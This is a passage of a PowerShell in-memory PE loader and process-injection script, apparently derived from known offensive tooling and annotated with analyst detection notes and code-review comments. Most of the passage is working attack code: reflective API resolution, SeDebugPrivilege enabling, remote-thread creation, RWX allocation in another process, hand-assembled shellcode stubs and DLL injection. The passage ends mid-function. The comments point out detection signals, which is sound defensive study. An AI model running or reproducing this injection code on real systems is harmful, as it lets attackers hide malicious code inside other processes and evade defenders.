    # Analyst note: resolving UnsafeNativeMethods through reflection is a well-known
    # hallmark of in-memory PowerShell loaders; the string
    # 'Microsoft.Win32.UnsafeNativeMethods' is a good logging/detection anchor.
    Function Get-ProcAddress
    {
        Param
        (
            [OutputType([IntPtr])]

            [Parameter( Position = 0, Mandatory = $True )]
            [String]
            $Module,

            [Parameter( Position = 1, Mandatory = $True )]
            [String]
            $Procedure
        )


        # Locate the GAC copy of System.dll among the loaded assemblies.
        # NOTE(review): GlobalAssemblyCache is always $false on .NET Core / PowerShell 7,
        # so $SystemAssembly would be $null there and the GetType call below would fail.
        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }
        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')

        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')

        # Newer frameworks expose more than one GetProcAddress overload, which makes the
        # plain GetMethod call throw (presumably AmbiguousMatchException); the fallback
        # picks the (HandleRef, string) overload explicitly.
        Try
        {
            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
        }
        Catch
        {
            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress',
                                                            [reflection.bindingflags] "Public,Static",
                                                            $null,
                                                            [System.Reflection.CallingConventions]::Any,
                                                            @((New-Object System.Runtime.InteropServices.HandleRef).GetType(),
                                                            [string]),
                                                            $null)
        }


        # Despite the name, this is the handle of whatever $Module was requested.
        # Only GetModuleHandle is used (no LoadLibrary), so a module that is not yet
        # loaded yields a zero handle and, below, a zero procedure address.
        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
        $tmpPtr = New-Object IntPtr
        # HandleRef(wrapper, handle): $tmpPtr is merely the wrapper object the HandleRef keeps alive.
        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)


        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
    }
  862.  
  863.  
    # Enables SeDebugPrivilege on the current thread's token. Flow: OpenThreadToken; if
    # the thread has no token of its own (ERROR_NO_TOKEN) impersonate self and retry;
    # LookupPrivilegeValue("SeDebugPrivilege"); fill a TOKEN_PRIVILEGES with that one
    # LUID marked SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges.
    # Arguments: $Win32Functions, $Win32Types, $Win32Constants - the tables built by
    #            Get-Win32Functions, Get-Win32Types and Get-Win32Constants
    # Returns:   nothing. Throws on thread-handle, token-open, impersonation and
    #            privilege-lookup failures; see the review notes below for the failure
    #            it does not report.
    # Analyst note: enabling SeDebugPrivilege is the usual precursor to opening
    # processes the caller could not otherwise touch; token privilege adjustments are
    # visible through the Authorization Policy Change audit category, and the
    # self-impersonation that may precede it is a second observable.
    Function Enable-SeDebugPrivilege
    {
        Param(
        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Functions,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Types,

        [Parameter(Position = 3, Mandatory = $true)]
        [System.Object]
        $Win32Constants
        )

        [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
        if ($ThreadHandle -eq [IntPtr]::Zero)
        {
            Throw "Unable to get the handle to the current thread"
        }

        # OpenThreadToken(thread, access, OpenAsSelf = $false, out token).
        [IntPtr]$ThreadToken = [IntPtr]::Zero
        [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
        if ($Result -eq $false)
        {
            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
            if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
            {
                # No thread token yet: impersonate ourselves so one exists.
                # 3 is SECURITY_IMPERSONATION_LEVEL SecurityDelegation.
                $Result = $Win32Functions.ImpersonateSelf.Invoke(3)
                if ($Result -eq $false)
                {
                    Throw "Unable to impersonate self"
                }

                $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
                if ($Result -eq $false)
                {
                    Throw "Unable to OpenThreadToken."
                }
            }
            else
            {
                Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
            }
        }

        # NOTE(review): $PLuid is allocated with AllocHGlobal but never freed; only
        # $TokenPrivilegesMem is released at the end of the function.
        [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
        $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
        if ($Result -eq $false)
        {
            Throw "Unable to call LookupPrivilegeValue"
        }

        # PtrToStructure on the freshly allocated (uninitialised) buffer is only a way to
        # obtain a TOKEN_PRIVILEGES instance; the fields that matter are assigned below.
        # Assigning Privileges.Luid directly assumes Privileges is a single structure in
        # Get-Win32Types' definition rather than an array — presumably the case.
        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
        [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
        $TokenPrivileges.PrivilegeCount = 1
        $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
        $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)

        # AdjustTokenPrivileges(token, DisableAllPrivileges = $false, new state, size,
        # previous state = NULL, return length = NULL).
        $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        if (($Result -eq $false) -or ($ErrorCode -ne 0))
        {
            # NOTE(review): the failure is swallowed. In particular AdjustTokenPrivileges
            # returns TRUE with last error ERROR_NOT_ALL_ASSIGNED (1300) when the caller
            # does not actually hold SeDebugPrivilege, so the function returns as though
            # the privilege were enabled and a later OpenProcess fails instead.
        }

        # NOTE(review): $ThreadToken is never closed; no CloseHandle delegate exists in
        # Get-Win32Functions.
        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
    }
  935.  
  936.  
    # Starts a thread in the process identified by $ProcessHandle at $StartAddress with
    # $ArgumentPtr as its single argument, and returns the thread handle. When
    # 6.0 <= OSVersion < 6.2 (Vista, Server 2008, Windows 7) the NtCreateThreadEx
    # delegate is used; otherwise CreateRemoteThread. The version test mirrors the one
    # in Get-Win32Functions that decides whether NtCreateThreadEx is bound at all.
    # Arguments: $ProcessHandle  - handle to the target process (must carry
    #                              thread-creation access)
    #            $StartAddress   - address in the target at which the thread starts
    #            $ArgumentPtr    - argument passed to the thread (default IntPtr.Zero)
    #            $Win32Functions - delegate table from Get-Win32Functions
    # Returns:   [IntPtr] thread handle; raises a terminating error when it is zero.
    # Analyst note: both paths create a thread in another process, which is what
    # Sysmon Event ID 8 (CreateRemoteThread) and kernel thread-creation callbacks
    # record, independent of which API the script chose.
    Function Create-RemoteThread
    {
        Param(
        [Parameter(Position = 1, Mandatory = $true)]
        [IntPtr]
        $ProcessHandle,

        [Parameter(Position = 2, Mandatory = $true)]
        [IntPtr]
        $StartAddress,

        [Parameter(Position = 3, Mandatory = $false)]
        [IntPtr]
        $ArgumentPtr = [IntPtr]::Zero,

        [Parameter(Position = 4, Mandatory = $true)]
        [System.Object]
        $Win32Functions
        )

        [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero

        # NOTE(review): without a compatibility manifest .NET reports 6.2 on Windows 8.1
        # and later, so the NtCreateThreadEx branch is effectively Vista/2008/7 only.
        $OSVersion = [Environment]::OSVersion.Version

        if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
        {

            # Argument order follows the delegate declared in Get-Win32Functions: out
            # handle, desired access (0x1FFFFF = THREAD_ALL_ACCESS on Vista+), object
            # attributes, process, start routine, argument, create-suspended flag ($false =
            # run immediately), zero bits, stack size, max stack size, attribute list.
            # NOTE(review): $RetVal is the NTSTATUS but is only echoed into the message,
            # never tested; GetLastWin32Error after a direct ntdll call is not meaningful
            # because Nt* routines do not set the Win32 last-error value.
            $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
            $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
            if ($RemoteThreadHandle -eq [IntPtr]::Zero)
            {
                Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
            }
        }

        else
        {

            # CreateRemoteThread(hProcess, lpThreadAttributes = NULL, dwStackSize = 0xFFFF,
            # lpStartAddress, lpParameter, dwCreationFlags = 0, lpThreadId = NULL).
            $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
        }

        # Only failure check on the CreateRemoteThread path (the NtCreateThreadEx path has
        # already thrown). Error style differs from the Throw above; both terminate the
        # caller, but they surface through different exception types.
        if ($RemoteThreadHandle -eq [IntPtr]::Zero)
        {
            Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop
        }

        return $RemoteThreadHandle
    }
  985.  
  986.  
  987.  
    # Reads the IMAGE_DOS_HEADER at $PEHandle, follows e_lfanew to the NT headers,
    # validates the "PE\0\0" signature and returns an object carrying NtHeadersPtr,
    # IMAGE_NT_HEADERS (the 32- or 64-bit structure) and PE64Bit.
    # Arguments: $PEHandle   - address of the image (a mapped image or a raw file copy)
    #            $Win32Types - structure types from Get-Win32Types
    # Returns:   PSObject with the three NoteProperties above.
    # Throws:    when the NT signature does not match.
    # NOTE(review): e_lfanew is trusted as-is. Nothing bounds it against the size of
    # the buffer, so a crafted or truncated input makes PtrToStructure read past the
    # allocation (Get-PEBasicInfo hands in a buffer exactly $PEBytes.Length long).
    Function Get-ImageNtHeaders
    {
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [IntPtr]
        $PEHandle,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        $NtHeadersInfo = New-Object System.Object


        $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)


        # e_lfanew is widened through [UInt64] before [Int64], which appears intended to
        # keep a large offset from being sign-extended before the unsigned add.
        [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
        $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
        # The 64-bit layout is parsed first and used only if Magic says PE32+; Magic sits
        # at the same offset in both layouts, so probing it this way is safe.
        $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)


        # 0x00004550 is "PE\0\0" read as a little-endian DWORD.
        if ($imageNtHeaders64.Signature -ne 0x00004550)
        {
            throw "Invalid IMAGE_NT_HEADER signature."
        }

        # Comparing against the enum member name relies on Magic being declared as an
        # enum type in Get-Win32Types (not visible here).
        if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
        {
            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
        }
        else
        {
            # $ImageNtHeaders32 and $imageNtHeaders32 are the same variable: PowerShell
            # variable names are case-insensitive.
            $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
        }

        return $NtHeadersInfo
    }
  1030.  
  1031.  
  1032.  
    # Extracts the header fields needed before an image is mapped — PE64Bit,
    # OriginalImageBase, SizeOfImage, SizeOfHeaders and DllCharacteristics — from raw
    # PE file bytes. The bytes are copied into a temporary unmanaged buffer because
    # Get-ImageNtHeaders works on a pointer; the buffer is released afterwards.
    # Arguments: $PEBytes    - raw PE file contents
    #            $Win32Types - structure types from Get-Win32Types
    # Returns:   PSObject with the five NoteProperties above.
    # NOTE(review): there is no try/finally, so when Get-ImageNtHeaders throws (bad
    # signature, unreadable header) the AllocHGlobal buffer leaks. There is also no
    # minimum-length check on $PEBytes before the DOS header is read from it.
    Function Get-PEBasicInfo
    {
        Param(
        [Parameter( Position = 0, Mandatory = $true )]
        [Byte[]]
        $PEBytes,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        $PEInfo = New-Object System.Object


        # Buffer is exactly $PEBytes.Length bytes; any header offset beyond that is an
        # out-of-bounds read in Get-ImageNtHeaders.
        [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)
        [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null


        $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types


        # Only OptionalHeader fields are copied out; the structure itself is discarded
        # with the buffer below.
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)


        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)

        return $PEInfo
    }
  1066.  
  1067.  
  1068.  
  1069.  
    Function Get-PEDetailedInfo
    {
        # Describe a PE image that is already mapped in memory at $PEHandle.
        #
        # Returns a PSObject with NoteProperties PEHandle, IMAGE_NT_HEADERS,
        # NtHeadersPtr, PE64Bit, SizeOfImage, SectionHeaderPtr and FileType
        # ('DLL' or 'EXE'). Other helpers in this scriptblock read these names,
        # so the property set is part of the contract.
        #
        # Throws if $PEHandle is null/zero, or if FileHeader.Characteristics
        # carries neither IMAGE_FILE_DLL nor IMAGE_FILE_EXECUTABLE_IMAGE.
        Param(
        [Parameter( Position = 0, Mandatory = $true)]
        [IntPtr]
        $PEHandle,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Types,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Constants
        )

        if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)
        {
            throw 'PEHandle is null or IntPtr.Zero'
        }

        $PEInfo = New-Object System.Object

        # Validates the PE signature and picks the 32/64-bit header layout;
        # throws on a bad signature.
        $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types


        $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle
        $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)
        $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)
        $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)

        # The section header table starts right after the NT headers, whose
        # size depends on whether the 32- or 64-bit optional header is present.
        if ($PEInfo.PE64Bit -eq $true)
        {
            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
            $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
        }
        else
        {
            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
            $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
        }

        # IMAGE_FILE_DLL is tested first: a DLL normally also has
        # IMAGE_FILE_EXECUTABLE_IMAGE set, so the order of the checks matters.
        if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
        {
            $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'
        }
        elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
        {
            $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'
        }
        else
        {
            Throw "PE file is not an EXE or DLL"
        }

        return $PEInfo
    }
  1129.  
  1130.  
    Function Import-DllInRemoteProcess
    {
        # Load the DLL whose ANSI path is at $ImportDllPathPtr into the process
        # referenced by $RemoteProcHandle, and return that module's handle (as
        # seen in the remote process) as an IntPtr.
        #
        # Reads script-scope state that is not passed as a parameter:
        # $Win32Functions, $Win32Constants and $PEInfo (PE64Bit chooses the
        # 64-bit or 32-bit strategy below).
        #
        # Detection note: the VirtualAllocEx -> WriteProcessMemory ->
        # CreateRemoteThread sequence (with a PAGE_EXECUTE_READWRITE allocation
        # on 64-bit targets) is the classic cross-process injection pattern and
        # is the place to monitor for this loader.
        #
        # Known issues left as-is: the two "... to call GetProcAddress failed"
        # messages below are copy/paste artefacts (the remote thread runs
        # LoadLibraryA); $SCPSMemOriginal and $ReturnValMem (AllocHGlobal) are
        # never freed; the remote allocations are not released on any throw path.
        Param(
        [Parameter(Position=0, Mandatory=$true)]
        [IntPtr]
        $RemoteProcHandle,

        [Parameter(Position=1, Mandatory=$true)]
        [IntPtr]
        $ImportDllPathPtr
        )

        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])

        # Size includes the terminating NUL of the ANSI path.
        $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
        $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)
        $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
        if ($RImportDllPathPtr -eq [IntPtr]::Zero)
        {
            Throw "Unable to allocate memory in the remote process"
        }

        [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
        $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)

        if ($Success -eq $false)
        {
            Throw "Unable to write DLL path to remote process memory"
        }
        if ($DllPathSize -ne $NumBytesWritten)
        {
            Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
        }

        # LoadLibraryA is resolved in *this* process and the address reused in
        # the remote one -- assumes kernel32.dll is mapped at the same base in
        # both and that the architectures match; TODO confirm with the caller.
        $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
        $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA")

        [IntPtr]$DllAddress = [IntPtr]::Zero


        if ($PEInfo.PE64Bit -eq $true)
        {
            # 64-bit path: presumably because a 64-bit HMODULE cannot be
            # returned through the 32-bit thread exit code used in the else
            # branch, the result is instead written to a remote slot
            # ($LoadLibraryARetMem) and read back with ReadProcessMemory.
            $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
            if ($LoadLibraryARetMem -eq [IntPtr]::Zero)
            {
                Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
            }


            # Stub fragments; three pointer-sized operands (remote path pointer,
            # LoadLibraryA address, return slot) are spliced in between them,
            # which is why $SCLength adds ($PtrSize * 3).
            $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
            $LoadLibrarySC2 = @(0x48, 0xba)
            $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)
            $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)

            $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)
            $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
            $SCPSMemOriginal = $SCPSMem

            # $SCPSMem is advanced after each write; $SCPSMemOriginal keeps the
            # start of the local buffer for the WriteProcessMemory below.
            Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)
            [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
            Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)
            [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
            Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)
            [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
            Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)


            # RWX allocation in the target: a strong detection signal.
            $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
            if ($RSCAddr -eq [IntPtr]::Zero)
            {
                Throw "Unable to allocate memory in the remote process for shellcode"
            }

            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
            if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
            {
                Throw "Unable to write shellcode to remote process memory."
            }

            # 20 s timeout; only 0 (WAIT_OBJECT_0) counts as the thread having
            # finished. The message text is wrong: this thread runs LoadLibraryA.
            $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
            $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
            if ($Result -ne 0)
            {
                Throw "Call to CreateRemoteThread to call GetProcAddress failed."
            }


            # Unlike Get-RemoteProcAddress, $NumBytesWritten is not checked here
            # after the read. $ReturnValMem is never freed.
            [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
            $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
            if ($Result -eq $false)
            {
                Throw "Call to ReadProcessMemory failed"
            }
            [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])

            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
        }
        else
        {
            # 32-bit path: LoadLibraryA is used directly as the thread start
            # routine with the remote path as its argument, and the HMODULE is
            # taken from the thread exit code. A zero exit code (NULL HMODULE)
            # is reported as failure. The message text again says
            # GetProcAddress although LoadLibraryA was called.
            [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions
            $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
            if ($Result -ne 0)
            {
                Throw "Call to CreateRemoteThread to call GetProcAddress failed."
            }

            [Int32]$ExitCode = 0
            $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)
            if (($Result -eq 0) -or ($ExitCode -eq 0))
            {
                Throw "Call to GetExitCodeThread failed"
            }

            [IntPtr]$DllAddress = [IntPtr]$ExitCode
        }

        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null

        return $DllAddress
    }
  1261.  
  1262.  
    Function Get-RemoteProcAddress
    {
        # Resolve an export of a module already loaded in the remote process and
        # return its address (valid in that process) as an IntPtr.
        #
        # Parameters:
        #   $RemoteProcHandle - handle to the target process.
        #   $RemoteDllHandle  - module handle in the remote process.
        #   $FunctionNamePtr  - when $LoadByOrdinal is $false: pointer to an ANSI
        #                       function name in this process; when $true: the
        #                       ordinal value itself (the caller masks it off the
        #                       thunk), which is passed through untouched.
        #   $LoadByOrdinal    - selects the two meanings above.
        #
        # Reads script-scope $Win32Functions, $Win32Constants and $PEInfo.
        #
        # Like Import-DllInRemoteProcess, this runs a small stub in the remote
        # process (VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory,
        # CreateRemoteThread) and reads the result back from a remote slot.
        #
        # Known issues left as-is: the "DLL path" error messages below are
        # copy/paste artefacts (a function name is being written); the
        # VirtualAllocEx for $GetProcAddressRetMem casts its size as
        # [UInt64][UInt64] where every other call uses [UIntPtr][UInt64] --
        # presumably it still marshals, but it is inconsistent; $SCPSMemOriginal
        # and $ReturnValMem (AllocHGlobal) are never freed; remote allocations
        # are not released on throw paths.
        Param(
        [Parameter(Position=0, Mandatory=$true)]
        [IntPtr]
        $RemoteProcHandle,

        [Parameter(Position=1, Mandatory=$true)]
        [IntPtr]
        $RemoteDllHandle,

        [Parameter(Position=2, Mandatory=$true)]
        [IntPtr]
        $FunctionNamePtr,

        [Parameter(Position=3, Mandatory=$true)]
        [Bool]
        $LoadByOrdinal
        )

        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])

        [IntPtr]$RFuncNamePtr = [IntPtr]::Zero

        if (-not $LoadByOrdinal)
        {
            # By name: copy the NUL-terminated ANSI name into the remote process.
            $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr)


            $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)
            $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
            if ($RFuncNamePtr -eq [IntPtr]::Zero)
            {
                Throw "Unable to allocate memory in the remote process"
            }

